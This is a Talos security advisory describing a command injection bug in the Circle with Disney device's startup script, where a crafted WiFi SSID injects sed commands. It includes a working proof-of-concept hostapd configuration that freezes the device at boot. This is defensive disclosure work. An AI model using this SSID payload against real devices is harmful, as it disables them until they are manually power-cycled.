Talos Vulnerability Report

TALOS-2017-0446

Circle with Disney Startup WiFi Channel Parsing Command Injection Vulnerability

October 31, 2017
CVE Number

CVE-2017-12094

Summary

An exploitable vulnerability exists in the WiFi Channel parsing of Circle with Disney running firmware 2.0.1. A specially crafted SSID can cause the device to execute arbitrary sed commands. An attacker needs to setup an access point reachable by the device to trigger this vulnerability.

Tested Versions

Circle with Disney 2.0.1

Product URLs

https://meetcircle.com/

CVSSv3 Score

7.4 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CWE

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

Details

Circle with Disney is a network device used to monitor internet use of children on a given network.

At the end of the boot process, the script "/mnt/shares/usr/bin/startcircle" is executed. The script configures NTP, network interfaces, firewall rules and starts cronjobs.

Part of the script configures an Access Point, which is actually useful only for the initial configuration of the device.

...
# [1]
$DIR/scripts/aplist_create.sh

# [2]
best_ch=`awk 'BEGIN{max=-1000;} /Channel:/{ch=$4} /Signal/{s=$2+0; if (s>max){ max=s; maxch=ch}} END{print maxch}' /tmp/
ap_list.out`

[ "x$best_ch" != "x" ] && {
        echo $best_ch > /tmp/current_channel

        # [3]
        sed -i "s/channel=.*/channel=$best_ch/g" /tmp/hostapd.conf
}
...

At [1] the script calls aplist_create.sh, which has the following contents:

#!/bin/sh
ifconfig ra0 up
iwinfo ra0 scan > /tmp/ap_list.out      # [4]

`iwinfo` [4] prints a list of Access Points detected by `ra0`, every entry has the following form:

Cell 01 - Address: 11:22:33:44:55:66
          ESSID: "valid-ssid"
          Mode: Master  Channel: 1
          Signal: -22 dBm  Quality: 70/70
          Encryption: WPA2 PSK (CCMP)

After creating "ap_list.out" at [1], the initial script will select the channel that has the best signal. The channel is extracted as a string, using awk with its default field separators [2].

Finally at [3] the channel is used in a sed substitution command, without any sanitization.

An SSID field in an 802.11 frame has a maximum length of 32 bytes and can contain any character. Moreover, iwinfo will print the characters found in the SSID without escaping. This means that an attacker may use an SSID containing new-line characters to add arbitrary lines to the iwinfo output.

This allows an attacker to control the channel string returned by awk, which gets passed to sed at [3].

Exploit Proof-of-Concept

The following proof of concept shows how to freeze the box on startup by broadcasting a specific SSID. The box will need manual power-cycling to boot again.

$ cat << 'EOF' > hostapd.conf
interface=wlan0
channel=1
ssid2=P"Channel: x /;:x/g;bx #Signal"
EOF
$ hostapd -B ./hostapd.conf

The SSID above is injected in the sed substitution command. Since semicolons are not escaped, they can be used to inject a new sed command.

In this example the injection creates an infinite loop by defining a "x/g" label and by jumping to it using "bx/g" (the ending "/g" is added by circle's script at [3]).

Timeline

2017-09-20 - Vendor Disclosure
2017-10-31 - Public Release

Credit

Discovered by Claudio Bozzato and Lilith Wyatt <(^_^)> of Cisco Talos.